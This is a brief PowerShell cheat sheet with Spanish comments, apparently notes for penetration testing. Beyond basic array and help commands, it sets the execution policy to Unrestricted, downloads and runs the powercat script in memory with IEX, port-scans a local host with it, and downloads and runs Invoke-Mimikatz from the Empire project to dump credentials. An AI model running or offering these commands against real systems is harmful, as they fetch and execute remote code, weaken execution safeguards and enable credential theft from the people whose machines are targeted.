# RECORRER UN ARRAY
(902, 22, 80, 135, 445) | %{ echo $_ }

# VER AYUDA EN LINEA
 Get-Help Get-ExecutionPolicy -Online
 
 # CAMBIAR LA POLITICA DE EJECUCION
 Set-ExecutionPolicy Unrestricted
 
 ##################################################################################################################################################################
 # IMPORTAR SCRIPT POWERCAT
 IEX (New-Object System.Net.webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
 
 #INDENTIFICAR PUERTOS ABIERTOS
 (902, 22, 80, 135, 445) | % { powercat -c 192.168.0.103 -p $_ -t 1 -Verbose -d} 
 
 ########################################################################################################################################################################
 # CARGAR EN MEMORIA MIMIKATZ
 IEX ([System.Text.Encoding]::UTF8.GetString((New-Object system.net.webClient).DownloadData("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1")))
 
 
 
